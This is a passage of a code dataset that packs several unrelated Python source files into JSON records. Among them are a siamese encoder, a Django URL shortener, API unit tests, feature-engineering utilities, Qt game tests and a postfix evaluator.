------------------------------------------------------------------------------\nclass 
SiameseModule(pl.LightningModule):\n def __init__(\n self,\n *,\n encoder_type,\n encoder_params,\n optimizer,\n optimizer_params,\n scheduler,\n scheduler_params,\n loss_fn,\n ):\n super().__init__()\n\n self.encoder_type = encoder_type\n\n self.encoder = encoder_factory[encoder_type](**encoder_params)\n self.enc_dimension = self.encoder.enc_dimension\n self.optimizer = optimizer\n self.scheduler = scheduler\n self.optimizer_params = optimizer_params\n self.scheduler_params = scheduler_params\n self.loss_fn = loss_fn()\n self.save_hyperparameters()\n\n def forward(self, batch):\n x1 = batch[\"P1\"]\n x2 = batch[\"P2\"]\n d = batch[\"D\"]\n u = self.encoder(x1)\n v = self.encoder(x2)\n\n assert len(u.shape) == 2\n dpred = F.cosine_similarity(u, v, dim=1, eps=1e-6)\n return self.loss_fn(dpred, d)\n\n def training_step(self, batch, _):\n loss = self.forward(batch)\n self.log(\"train_loss\", loss, on_step=True, on_epoch=True, prog_bar=False)\n return loss\n\n def validation_step(self, batch, _):\n loss = self.forward(batch)\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n return loss\n\n def configure_optimizers(self):\n optimizer = self.optimizer(self.parameters(), **self.optimizer_params)\n scheduler = self.scheduler(optimizer, **self.scheduler_params)\n return {\n \"optimizer\": optimizer,\n \"lr_scheduler\": scheduler,\n \"monitor\": \"val_loss\",\n }\n","repo_name":"kristen-schneider/precision-medicine","sub_path":"pytorch/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":15624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11783804338","text":"from django.shortcuts import render\n\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\n\nfrom .models import Shortener\n\nfrom .forms import ShortenerForm\n\n\ndef home_view(request):\n    template = 'urlshortener/index.html'\n\n    context = {}\n\n    context['form'] = ShortenerForm()\n\n    if request.method == 'GET':\n        return render(request, template, context)\n\n    elif request.method == 'POST':\n\n        used_form = ShortenerForm(request.POST)\n\n        if used_form.is_valid():\n            shortened_object = used_form.save()\n\n            new_url = request.build_absolute_uri('/') + shortened_object.short_url\n\n            user_url = shortened_object.user_url\n\n            context['new_url'] = new_url\n            context['user_url'] = user_url\n\n            return render(request, template, context)\n\n        context['errors'] = used_form.errors\n\n        return render(request, template, context)\n\n\ndef redirect_url_view(request, shortened_part):\n\n    try:\n        shortener = Shortener.objects.get(short_url=shortened_part)\n\n        shortener.visits += 1\n\n        shortener.save()\n\n        return HttpResponseRedirect(shortener.user_url)\n\n    except Exception:\n        raise Http404('Something went wrong')","repo_name":"sikorollo/shorturl","sub_path":"urlshortener/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21347523820","text":"#:@ TIME 2021/10/28 1:17\n#:@FILE test_recharge.py\n#:@EMAIL 1557225637@QQ.COM\nfrom api.recharge import Recharge\nfrom common.handle_excel import Excel_data\nfrom common.handle_log import new_log\nfrom common.handle_database import Database\nfrom common.handle_replace_data import replace_data\nfrom common.handle_data import replace_all_data\nfrom ddt import ddt,data\nimport json\nimport path\nimport unittest\n\nnew_ddt = Excel_data(path.excel_dir + '\\\\excel_data.xlsx', 
'recharge') # create the ddt object\n\n@ddt()\nclass Test_recharge(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n new_log.info(\"====== Recharge module test cases: execution started ========\")\n cls.new_recharge=Recharge()\n # cls.email,cls.password=cf.get_str('Account','email'),cf.get_str('Account','password')\n cls.db=Database()\n\n\n @classmethod\n def tearDownClass(cls) -> None:\n new_log.info(\"====== Recharge module test cases: execution finished ========\")\n\n\n\n @data(*new_ddt.all_data())\n def test_recharges(self,case):\n self._testMethodDoc=case['case_name']\n if case['check_sq']:\n case=replace_all_data(case)\n db_money=float(self.db.get_fetchone(case['check_sq'])['MONEY']) # query the current balance from the database\n new_log.debug('Current database balance: {}'.format(db_money))\n add_money=float(json.loads(case['data'])['money']) # get the amount added by the test case\n sum_money=db_money+add_money # compute the expected total amount\n # update the expected amount\n case=replace_data(case,str(sum_money),'#new_money#') # substitute the total amount\n # send the request to perform the recharge\n response=self.new_recharge.recharge(json.loads(case['data']))\n\n new_log.debug('Test case: {}'.format(case['case_name']))\n new_log.debug('Case after substitution: {}'.format(case))\n new_log.debug('API response parameters: {}'.format(response.json()))\n\n # convert the expected result to a dict before comparing\n\n self.assertEqual(json.loads(case['expect'])['code'],response.json()['code'])\n self.assertEqual(json.loads(case['expect'])['msg'],response.json()['msg'])\n if case['check_sq']:\n self.assertEqual(json.loads(case['expect'])['money'],str(response.json()['money']))\n\n\n\n\n","repo_name":"shiyong979796/test_api1","sub_path":"test_case/test_recharge.py","file_name":"test_recharge.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38303992475","text":"import numpy as np\nimport sys\nfrom scipy.interpolate import RectBivariateSpline, interp1d\nimport time\n\n\ndef get_condition_array(target_data, interp_data, max_cutoff=np.inf):\n    cond = np.zeros(len(interp_data), dtype=bool)\n\n    start_index = None\n    end_index = None\n\n    for i in range(len(cond)):\n        if start_index is None:\n            if interp_data[i] > np.min(target_data):\n                start_index = i-1\n            if interp_data[i] == np.min(target_data):\n                start_index = i\n        if end_index is None:\n            if interp_data[i] >= np.max(target_data) or \\\n               interp_data[i] >= max_cutoff:\n                end_index = i + 1\n    \n    cond[start_index : end_index] = True\n    return cond\n\n\n","repo_name":"ideasrule/platon","sub_path":"platon/_interpolator_3D.py","file_name":"_interpolator_3D.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"38831108799","text":"#!/usr/bin/env python\n# To use:\n# python setup.py install\n\nfrom setuptools import setup\n\nimport version\n\n# Read the package requirements from the requirements.txt file\nwith open('requirements.txt') as f:\n    install_requires = [ line.strip('\\n') for line in f.readlines() ]\n\nsetup(name = 'picmistandard',\n      version = version.__version__,\n      description = 'Python base classes for PICMI standard',\n      platforms = 'any',\n      packages = ['picmistandard'],\n      package_dir = {'picmistandard': '.'},\n      url = 'https://github.com/picmi-standard/picmi',\n      install_requires = install_requires\n      )\n","repo_name":"picmi-standard/picmi","sub_path":"PICMI_Python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"73305402385","text":"import glob\nimport os\nimport shutil\n\nDATA_DIR = \"doodle_images/\"\nINPUT_DIR = 
\"input/images\"\n\nfilenames = glob.glob(os.path.join(DATA_DIR, '*.zip'))\nfilenames = sorted(filenames)\n\nfor filename in filenames:\n category = filename[:-4].split('/')[-1]\n saved_dir = os.path.join(INPUT_DIR + \"/\" + category)\n os.makedirs(saved_dir)\n shutil.unpack_archive(filename, saved_dir, \"zip\")\n\nshutil.rmtree(DATA_DIR)\n","repo_name":"lanking520/quickdraw","sub_path":"image_prepare.py","file_name":"image_prepare.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8126797755","text":"import PyQt5\nfrom PyQt5.QtWidgets import QApplication\nimport sys\nimport unittest\nimport pickle\nimport tempfile\nfrom unittest.mock import patch\n\n\nfrom ultimatetictactoe.gui.singleplayer import *\nfrom ultimatetictactoe.game.boards import Macroboard\nfrom ultimatetictactoe.game.players.ai import select_bot\n\napp = QApplication(sys.argv)\n\n\nclass TestSingleplyaerMenu(unittest.TestCase):\n\n def setUp(self):\n self.menu = SinglePlayerMenu()\n\n def tearDown(self):\n del self.menu\n\n def getButton(self, n):\n return self.menu.difficultyMenu.layout().itemAt(n - 1).widget()\n\n def testDifficultyChange(self):\n CLICKS = [1, 2, 4, 3, 4, 3, 2, 3, 4, 3, 2, 1]\n for button in CLICKS:\n self.getButton(button).click()\n self.assertEqual(self.menu.difficultySelected, button)\n\n def testCreateRadio(self):\n radio = self.menu.createRadio('text', 123)\n self.assertIsInstance(radio, PyQt5.QtWidgets.QRadioButton)\n self.assertEqual(radio.id, 123)\n self.assertEqual(radio.text(), 'text')\n\n def testCreateDifficultyMenu(self):\n box = self.menu.createDifficultyMenu()\n self.assertIsInstance(box, PyQt5.QtWidgets.QGroupBox)\n for i in range(3):\n try:\n radio = box.layout().itemAt(i).widget()\n self.assertIsInstance(radio, PyQt5.QtWidgets.QRadioButton)\n self.assertEqual(radio.id, i + 1)\n except Exception:\n self.fail('Radio error')\n fake = box.layout().itemAt(4).widget()\n self.assertFalse(fake)\n\n\nclass TestSinglePlayer(unittest.TestCase):\n def setUp(self):\n self.game = SinglePlayer()\n\n def tearDown(self):\n del self.game\n\n def testStartGame(self):\n self.assertIsNone(self.game.game)\n self.game.gameMenu.startButton.click()\n self.assertIsNotNone(self.game.game)\n self.assertIsInstance(self.game.game, SinglePlayerGame)\n self.assertEqual(self.game.game.difficulty,\n self.game.gameMenu.difficultySelected)\n self.assertEqual(self.game.game.numberOfGames,\n self.game.gameMenu.numberOfGamesSpinBox.value())\n self.assertEqual(self.game.stack.currentWidget(), self.game.game)\n\n @patch('PyQt5.QtWidgets.QFileDialog.getOpenFileName')\n def testLoadGame(self, openfile):\n board = Macroboard()\n config = (3, 4, 1, 3, 0, True, board)\n file = tempfile.NamedTemporaryFile()\n with open(file.name, 'wb') as f:\n pickle.dump(config, f)\n openfile.return_value = (file.name, '')\n self.game.loadGame()\n self.assertEqual(self.game.game.difficulty, 3)\n self.assertEqual(self.game.game.numberOfGames, 4)\n self.assertEqual(self.game.game.gamesPlayed, 1)\n self.assertEqual(self.game.game.playerScore, 3)\n self.assertEqual(self.game.game.opponentScore, 0)\n self.assertEqual(self.game.game.playerIsNotFirst, True)\n\n @patch('PyQt5.QtWidgets.QFileDialog.getOpenFileName')\n def testLoadInvalidGame(self, openfile):\n file = tempfile.NamedTemporaryFile()\n with open(file.name, 'wb') as f:\n pickle.dump('some fake stuff', f)\n openfile.return_value = (file.name, '')\n self.game.loadGame()\n 
self.assertEqual(self.game.game.difficulty, 1)\n self.assertEqual(self.game.game.numberOfGames, 1)\n self.assertEqual(self.game.game.gamesPlayed, 0)\n self.assertEqual(self.game.game.playerScore, 0)\n self.assertEqual(self.game.game.opponentScore, 0)\n self.assertEqual(self.game.game.playerIsNotFirst, False)\n\n\nclass TestSinglePlayerGame(unittest.TestCase):\n def setUp(self):\n self.game = SinglePlayerGame()\n\n def tearDown(self):\n del self.game\n\n @patch('PyQt5.QtWidgets.QLabel.show')\n def testDisplayMessage(self, show):\n MESSAGES = ['asd', 'asd2', 'asd3']\n for message in MESSAGES:\n self.game.displayMessage(message)\n self.assertEqual(self.game.message.text(), message)\n show.assert_any_call()\n\n def testCreateLabel(self):\n label = self.game.createLabel('test')\n self.assertIsInstance(label, PyQt5.QtWidgets.QLabel)\n self.assertEqual(label.text(), 'test')\n\n @patch('PyQt5.QtWidgets.QFileDialog.getSaveFileName')\n def testSaveGame(self, getSave):\n file = tempfile.NamedTemporaryFile()\n getSave.return_value = (file.name, '')\n self.game.saveGame()\n with file:\n config = pickle.load(file)\n self.assertTupleEqual(config[:5], self.game.getConfiguration()[:5])\n\n def testGetConfiguration(self):\n config = self.game.getConfiguration()\n self.assertIsInstance(self.game.difficulty, int)\n self.assertEqual(config[0], self.game.difficulty)\n self.assertIsInstance(self.game.numberOfGames, int)\n self.assertEqual(config[1], self.game.numberOfGames)\n self.assertIsInstance(self.game.gamesPlayed, int)\n self.assertEqual(config[2], self.game.gamesPlayed)\n self.assertIsInstance(self.game.playerScore, int)\n self.assertEqual(config[3], self.game.playerScore)\n self.assertIsInstance(self.game.opponentScore, int)\n self.assertEqual(config[4], self.game.opponentScore)\n self.assertIsInstance(self.game.playerIsNotFirst, bool)\n self.assertEqual(config[5], self.game.playerIsNotFirst)\n self.assertIsInstance(self.game.gameWidget.board, Macroboard)\n self.assertEqual(config[6], self.game.gameWidget.board)\n\n def testLoadConfiguration(self):\n board = Macroboard()\n config = (3, 4, 1, 3, 0, True, board)\n self.game.loadConfiguration(config)\n self.assertEqual(config, self.game.getConfiguration())\n\n def testUpdateScoreAndReset(self):\n games = self.game.gamesPlayed\n player = self.game.playerIsNotFirst\n score1 = self.game.playerScore\n score2 = self.game.opponentScore\n self.game.updateScoreAndReset()\n self.assertNotEqual(games, self.game.gamesPlayed)\n self.assertNotEqual(player, self.game.playerIsNotFirst)\n self.assertEqual(score1, self.game.playerScore)\n self.assertEqual(score2, self.game.opponentScore)\n\n\nclass TestBotGame(unittest.TestCase):\n def setUp(self):\n self.bot = select_bot(1)\n self.game = BotGame(self.bot)\n\n def tearDown(self):\n del self.game\n\n def getButton(self, x, y):\n microboard = self.game.qBoard.grid.itemAt(x).widget()\n return microboard.layout().itemAt(y).widget()\n\n @patch('ultimatetictactoe.game.boards.Macroboard.make_move')\n @patch('ultimatetictactoe.gui.QMacroBoard.setClickEnabled')\n def testClicks(self, enabled, make_move):\n self.getButton(0, 0).click()\n enabled.assert_called_with(False)\n make_move.assert_called_with(0, 0)\n\n def testLoadBoard(self):\n board = Macroboard()\n self.game.loadBoard(board)\n self.assertEqual(self.game.board, 
board)\n","repo_name":"stoimenoff/ultimate-tic-tac-toe","sub_path":"tests/singleplayer_test.py","file_name":"singleplayer_test.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"28850487822","text":"import disnake\r\nfrom disnake import TextInputStyle\r\nfrom Dbot import bot\r\nimport sqlite3\r\nfrom Dbot_Requests_Folder.request_confirm_buttons import newbieconfirm\r\n\r\nclass MyModal(disnake.ui.Modal):\r\n def __init__(self):\r\n self.owner = bot.get_user(int(581348510830690344))\r\n self.new_member_data = []\r\n self.new_member_id = 0\r\n components = [\r\n disnake.ui.TextInput(\r\n label=\"Ник в майнкрафте\",\r\n placeholder=\"Ваш ник в майнкрафте\",\r\n custom_id=\"Ник\",\r\n style=TextInputStyle.short,\r\n max_length=50,\r\n ),\r\n disnake.ui.TextInput(\r\n label=\"Ваш возраст\",\r\n placeholder=\"Ваш реальный возраст\",\r\n custom_id=\"Возраст\",\r\n style=TextInputStyle.short,\r\n ),\r\n disnake.ui.TextInput(\r\n label=\"Сколько времени играете в майнкрафт?\",\r\n placeholder=\"Сколько времени играете?\",\r\n custom_id=\"Игровое время\",\r\n style=TextInputStyle.paragraph,\r\n ),\r\n disnake.ui.TextInput(\r\n label=\"Чем на вы занимались на сервере до нас?\",\r\n placeholder=\"Или ты - новичок на сервере?\",\r\n custom_id=\"Твоё прошлое\",\r\n style=TextInputStyle.paragraph,\r\n )\r\n ]\r\n super().__init__(\r\n title=\"Заявка на сервер\",\r\n custom_id=\"emb_create\",\r\n timeout=300,\r\n components=components,\r\n )\r\n\r\n async def callback(self, inter: disnake.ModalInteraction):\r\n \r\n self.new_member_id = inter.user.id\r\n new_member = bot.get_user(int(self.new_member_id))\r\n\r\n embed = disnake.Embed(\r\n title=\"Новая заявка\",\r\n description=f\"<@{self.new_member_id}> написал заявку! 
Accept or decline?\",\r\n color=0x00a2ff\r\n )\r\n \r\n\r\n with sqlite3.connect(\"no_access_to_requests.db\") as db:\r\n cursor = db.cursor()\r\n\r\n cursor.execute(\r\n \"\"\"CREATE TABLE IF NOT EXISTS requests_to_server(\r\n in_db_user_id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n discord_id BIGINT,\r\n nick TEXT,age INTEGER,\r\n play_time TEXT,\r\n past TEXT,\r\n p_status TEXT)\"\"\"\r\n )\r\n db.commit()\r\n\r\n\r\n vals = [self.new_member_id]\r\n\r\n for key, value in inter.text_values.items():\r\n vals.append(value)\r\n embed.add_field(\r\n name=key.capitalize(),\r\n value=value[:1024],\r\n inline=False,\r\n )\r\n\r\n # vals.append(\"Test_status\")\r\n\r\n with sqlite3.connect(\"no_access_to_requests.db\") as db:\r\n cursor = db.cursor()\r\n \r\n cursor.execute(\"INSERT INTO requests_to_server(discord_id, nick, age, play_time, past) VALUES (?, ?, ?, ?, ?)\", vals)\r\n db.commit()\r\n print(\"a new application has been added to the database!\")\r\n \r\n ban_user = []\r\n with sqlite3.connect(\"no_access_to_requests.db\") as db:\r\n cursor = db.cursor()\r\n cursor.execute(\"SELECT discord_id FROM requests_no_access\")\r\n vf = cursor.fetchall()\r\n for value in vf:\r\n # print(value)\r\n\r\n ban_user.append(value)\r\n # print(ban_user)\r\n\r\n ban_user = [value[0] for value in vf]\r\n \r\n \r\n if self.new_member_id in ban_user:\r\n but_user = self.new_member_id\r\n cursor.execute(\"SELECT cause FROM requests_no_access WHERE discord_id = ?\", (but_user,))\r\n fetch_reason = cursor.fetchone()\r\n reason = fetch_reason[0] if fetch_reason else \"Ask the city administration\"\r\n await inter.send(f\"You are not allowed to submit an application to this city.\nReason: {reason}\", ephemeral=True)\r\n return\r\n \r\n \r\n await self.owner.send(embed=embed, view=newbieconfirm(self.new_member_id))\r\n await inter.response.send_message(f\"<@{self.new_member_id}> application sent!\", delete_after=5)\r\n await new_member.send(f\"Your application is under review, <@{self.new_member_id}>\")","repo_name":"RigalHD/dbotpy","sub_path":"Dbot_Requests_Folder/Requests_Modal.py","file_name":"Requests_Modal.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121487826","text":"# https://atcoder.jp/contests/discovery2016-qual/submissions/17597044\n# B - ディスコ社内ツアー\nimport sys\nfrom bisect import bisect_left\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n    n = int(input())\n    A = list(map(int, input().split()))\n\n    MAX = max(A)\n    num_index = [[] for _ in range(MAX)]\n    for idx, a in enumerate(A):\n        num_index[a - 1].append(idx)\n\n    res = 1\n    prev = -1\n    for i in range(MAX):\n        if not num_index[i]:\n            continue\n        j = bisect_left(num_index[i], prev)\n        if j != 0:\n            res += 1\n            prev = num_index[i][j - 1]\n        else:\n            prev = num_index[i][-1]\n\n    if prev == 0:\n        res -= 1\n\n    print(res)\n\n\nif __name__ == '__main__':\n    resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/Discovery_Channel_2016_Qual/Discovery_Channel_2016_Qual-B.py","file_name":"Discovery_Channel_2016_Qual-B.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72334509907","text":"# Copyright (c) Microsoft Corporation\r\n# All rights reserved.\r\n#\r\n# MIT License\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and 
associated\r\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\r\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and\r\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\r\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\r\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\r\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\r\nimport pandas as pd\r\nimport numpy as np \r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.decomposition import TruncatedSVD\r\n\r\nfrom const import FeatureType, AGGREGATE_TYPE\r\n\r\n\r\ndef left_merge(data1, data2, on):\r\n \"\"\"\r\n merge util for dataframe\r\n \"\"\"\r\n if type(on) != list:\r\n on = [on]\r\n if (set(on) & set(data2.columns)) != set(on):\r\n data2_temp = data2.reset_index()\r\n else:\r\n data2_temp = data2.copy()\r\n columns = [f for f in data2.columns if f not in on]\r\n result = data1.merge(data2_temp, on = on, how='left')\r\n result = result[columns]\r\n return result\r\n\r\n\r\ndef concat(L):\r\n \"\"\"\r\n tool for concatenating several dataframes into a new dataframe.\r\n \"\"\"\r\n result = None\r\n for l in L:\r\n if l is None:\r\n continue\r\n if result is None:\r\n result = l\r\n else:\r\n result[l.columns.tolist()] = l\r\n return result\r\n\r\n\r\ndef name2feature(df, feature_space, target_name='label'):\r\n assert isinstance(feature_space, list)\r\n\r\n for key in feature_space:\r\n temp = key.split('_')\r\n assert len(temp) > 1\r\n\r\n op_name = temp[0]\r\n if len(temp) == 2:\r\n i = temp[1]\r\n command = op_name + '(df, i)'\r\n elif len(temp) == 3:\r\n i, j = temp[1], temp[2]\r\n command = op_name + '(df, [i, j])'\r\n elif len(temp) == 4:\r\n stat, i, j = temp[1], temp[2], temp[3]\r\n command = op_name + '(df, i, j, [stat])'\r\n else:\r\n raise RuntimeError('Unsupported OP: ' + str(key))\r\n\r\n df = eval(command)\r\n \r\n return df\r\n\r\n\r\ndef count(df, col):\r\n \"\"\"\r\n tool for count encoding\r\n \"\"\"\r\n df['count_{}'.format(col)] = df.groupby(col)[col].transform('count')\r\n return df\r\n\r\n\r\ndef crosscount(df, col_list):\r\n \"\"\"\r\n tool for multi-threaded bi_count\r\n \"\"\"\r\n assert isinstance(col_list, list)\r\n assert len(col_list) >= 2\r\n name = \"count_\"+ '_'.join(col_list)\r\n df[name] = df.groupby(col_list)[col_list[0]].transform('count')\r\n return df\r\n\r\n\r\ndef aggregate(df, num_col, col, stat_list = AGGREGATE_TYPE):\r\n agg_dict = {}\r\n for i in stat_list:\r\n agg_dict['AGG_{}_{}_{}'.format(i, num_col, col)] = i\r\n agg_result = df.groupby([col])[num_col].agg(agg_dict)\r\n r = left_merge(df, agg_result, on = [col])\r\n df = concat([df, r])\r\n return df\r\n\r\n\r\ndef nunique(df, id_col, col):\r\n \"\"\"\r\n get id group_by(id) nunique\r\n \"\"\"\r\n agg_dict = {}\r\n agg_dict['NUNIQUE_{}_{}'.format(id_col, col)] = 'nunique'\r\n agg_result = df.groupby([col])[id_col].agg(agg_dict)\r\n r = left_merge(df, agg_result, on = [col])\r\n df = 
concat([df, r])\r\n return df\r\n\r\n\r\ndef histstat(df, id_col, col, stat_list = AGGREGATE_TYPE):\r\n \"\"\"\r\n get id group_by(id) histogram statistics\r\n \"\"\"\r\n agg_dict = {}\r\n for i in stat_list:\r\n agg_dict['HISTSTAT_{}_{}_{}'.format(i, id_col, col)] = i\r\n df['temp_count'] = df.groupby(id_col)[id_col].transform('count')\r\n agg_result = df.groupby([col])['temp_count'].agg(agg_dict)\r\n r = left_merge(df, agg_result, on = [col])\r\n df = concat([df, r])\r\n del df['temp_count']\r\n return df\r\n\r\n\r\ndef base_embedding(x, model, size):\r\n \"\"\"\r\n embedding helper for bagofwords\r\n \"\"\"\r\n vec = np.zeros(size)\r\n x = [item for item in x if model.wv.__contains__(item)]\r\n for item in x:\r\n vec += model.wv[str(item)]\r\n if len(x) == 0:\r\n return vec\r\n else:\r\n return vec / len(x)\r\n\r\n\r\ndef embedding(df, col):\r\n \"\"\"\r\n This is the tool for multi-category embedding encoding.\r\n embedding for one single multi-category column.\r\n \"\"\"\r\n from gensim.models.word2vec import Word2Vec\r\n\r\n input_ = df[col].fillna('NA').apply(lambda x: str(x).split(' '))\r\n model = Word2Vec(input_, size=12, min_count=2, iter=5, window=5, workers=4)\r\n data_vec = []\r\n for row in input_:\r\n data_vec.append(base_embedding(row, model, size=12))\r\n svdT = TruncatedSVD(n_components=6)\r\n data_vec = svdT.fit_transform(data_vec)\r\n column_names = []\r\n for i in range(6):\r\n column_names.append('embedding_{}_{}'.format(col, i))\r\n data_vec = pd.DataFrame(data_vec, columns=column_names)\r\n df = pd.concat([df, data_vec], axis=1)\r\n return df\r\n\r\n\r\ndef add_noise(series, noise_level):\r\n \"\"\"\r\n target encoding smooth\r\n \"\"\"\r\n return series * (1 + noise_level * np.random.randn(len(series)))\r\n\r\n\r\ndef add_smooth(series, p, a = 1):\r\n \"\"\"\r\n target encoding smooth\r\n \"\"\"\r\n # smoothed mean: (sum + prior) / (count + smoothing)\r\n return (series.sum() + p) / (series.count() + a)\r\n\r\n\r\ndef target(df, col, target_name='label'):\r\n \"\"\"\r\n target encoding using 5 k-fold with smoothing\r\n\r\n target_name : supervised learning task prediction target name, y.\r\n \"\"\"\r\n df[col] = df[col].fillna('-9999999')\r\n mean_of_target = df[target_name].mean()\r\n\r\n kf = KFold(n_splits = 5, shuffle = True, random_state=2019) \r\n col_mean_name = \"target_{}\".format(col)\r\n X = df[df[target_name].isnull() == False].reset_index(drop=True)\r\n X_te = df[df[target_name].isnull()].reset_index(drop=True)\r\n X.loc[:, col_mean_name] = np.nan\r\n \r\n for tr_ind, val_ind in kf.split(X):\r\n X_tr, X_val = X.iloc[tr_ind], X.iloc[val_ind]\r\n X.loc[df.index[val_ind], col_mean_name] = X_val[col].map(X_tr.groupby(col)[target_name].apply(lambda x: add_smooth(x, 0.5, 1)))\r\n\r\n tr_agg = X[[col, target_name]].groupby([col])[target_name].apply(lambda x: add_smooth(x, 0.5, 1)).reset_index()\r\n tr_agg.columns = [col, col_mean_name]\r\n\r\n X_te = X_te.merge(tr_agg, on = [col], how = 'left')\r\n _s = np.array(pd.concat([X[col_mean_name], X_te[col_mean_name]]).fillna(mean_of_target))\r\n df[col_mean_name] = _s\r\n return df\r\n\r\n","repo_name":"SpongebBob/tabular_automl_NNI","sub_path":"fe_util.py","file_name":"fe_util.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"48"} +{"seq_id":"6720299125","text":"__all__ = [\"MNISTConfig\"]\nfrom typing import Tuple\n\nfrom torch.utils.data import Dataset\nfrom torchvision.datasets import MNIST\n\nfrom ..utils import chain_transforms\nfrom . 
import DatasetConfig\n\n\nclass MNISTConfig(DatasetConfig):\n type = \"mnist\"\n download: bool = True\n\n def build_datasets(self) -> Tuple[Dataset, Dataset]:\n train_dset = MNIST(\n self.root,\n train=True,\n transform=chain_transforms(self.transform_callables),\n download=self.download,\n )\n test_dset = MNIST(\n self.root,\n train=False,\n transform=chain_transforms(self.transform_callables),\n download=self.download,\n )\n return train_dset, test_dset\n","repo_name":"tsironisbi/config4ml","sub_path":"src/config4ml/data/dataset/builtin.py","file_name":"builtin.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33168128811","text":"'''\nExpected Time Complexity: O(|S|)\nExpected Auxiliary Space: O(|S|)\n'''\n\nclass Solution:\n    \n    #Function to evaluate a postfix expression.\n    def evaluatePostfix(self, S):\n        #code here\n        stack=[]\n        \n        for i in (S):\n            if i.isdigit(): # returns True if the character is a digit; next we convert it to an integer\n                stack.append(int(i)) # convert string (number) into integer\n                \n            else:\n                val_2=stack.pop() # pop the top 2 elements from the stack to perform the operation\n                val_1=stack.pop()\n                if i=='*':\n                    stack.append(val_1*val_2)\n                elif i=='/':\n                    stack.append(val_1//val_2)\n                elif i=='+':\n                    stack.append(val_1+val_2)\n                else:\n                    stack.append(val_1-val_2)\n        ans=stack.pop()\n        return ans\n","repo_name":"anujdubey-22/Data_Structure","sub_path":"Stack and queues/Evaluation of Postfix Expression .py","file_name":"Evaluation of Postfix Expression .py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26242258502","text":"import sympy\nfrom sympy.vector import Laplacian\nfrom dolfinx import *\n\nV = sympy.Symbol(\"V\")\n\nu = sympy.Function('u')(V) # Trial\ntest_function = sympy.Function(\"test_function\")(V)\n# computation of the Poisson equation\nlap_u = Laplacian(u) # Laplace operator on u\n\n\nomega = sympy.Symbol(\"omega\")\nterm = sympy.Integral(3 + sympy.Pow(lap_u, 3) + 5, omega)\n\nlap = term.atoms(sympy.Pow)\n\nsympy.pprint(lap)\nprint(len(lap))\n#sympy.pprint(term)\n\n","repo_name":"Denn1sMay/ma","sub_path":"Test/trash2.py","file_name":"trash2.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15220599591","text":"\"Applies a 2D Window (blackman, hamming, or hanning) to the k-space data\"\nimport numpy as N\nfrom recon.operations import Operation, Parameter, ChannelIndependentOperation\n\nwindow_types = {\n    \"blackman\": N.blackman,\n    \"hamming\": N.hamming,\n    \"hanning\": N.hanning}\n\ndef getWindow(winName, xSize, ySize):\n    \"\"\"\n    generates a 2D window in the following manner:\n    outerproduct(window(ySize), window(xSize))\n    @param winName: name of the window; can be blackman, hamming, or hanning\n    \"\"\" \n    window = window_types.get(winName)\n    if window is None: raise ValueError(\"unsupported window type: %s\"%winName)\n    \n    p = N.outer(window(ySize), window(xSize))\n    \n    #return window filter, normalizing just in case\n    return p/p.max()\n\n\nclass Window (Operation):\n    \"\"\"\n    Apodizes the k-space data based on a specified 2D window.\n    \"\"\"\n    params = (\n        Parameter(name=\"win_name\", type=\"str\", default=\"hanning\",\n                  